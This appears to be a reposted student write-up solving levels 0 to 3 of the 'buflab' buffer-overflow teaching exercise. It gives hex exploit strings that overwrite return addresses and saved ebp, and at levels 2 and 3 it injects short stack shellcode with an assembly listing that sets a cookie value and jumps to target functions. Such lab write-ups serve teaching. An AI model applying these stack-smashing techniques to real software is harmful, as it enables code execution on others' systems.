buflab

Level 0: 
re-write return address with smoke()'s address '0x08048ef0' 
so exploit file should be: 
---- 
30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 f0 8e 04 08 
---- 
'30' can be any byte value 

Level 1: 
re-wirte return address with fizz()'s address '0x08048e80' 
re-write argument with cookie code '0x11264556' 
---- 
30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 80 8e 04 08 56 45 26 11 
---- 
'30' can be any byte value 

Level 2: 
re-write return value to the start of array 0xbfffb70c, where we put the code 
the code is described below. 

3: b8 56 45 26 11 mov $0x11264556,%eax 
8: a3 dc b0 04 08 mov %eax,0x804b0dc 
d: 68 10 8e 04 08 push $0x8048e10 
12: c3 ret 

re-write the value of global_value at 0x0804b0dc with cookie code 0x11264556 
push bang()'s (0x08048e10) address, and return to it 
---- 
b8 56 45 26 11 a3 dc b0 04 08 68 10 8e 04 08 c3 0c b7 ff bf 
---- 

Level 3: 
re-write return address to the start of vector 0xbfffb70c, where we put the code 
re-write the saved ebp with the original value 0xbfffb748 
the code is: 
3: b8 56 45 26 11 mov $0x11264556,%eax 
8: 68 9c 91 04 08 push $0x804919c 
d: c3 ret 
re-write the eax register with cookie code 0x11264556 
push the real return address, and return 
---- 
b8 56 45 26 11 68 9c 91 04 08 c3 90 48 b7 ff bf 0c b7 ff bf 
---- 

转载于:https://www.cnblogs.com/qzchenwl/archive/2010/04/15/1712921.html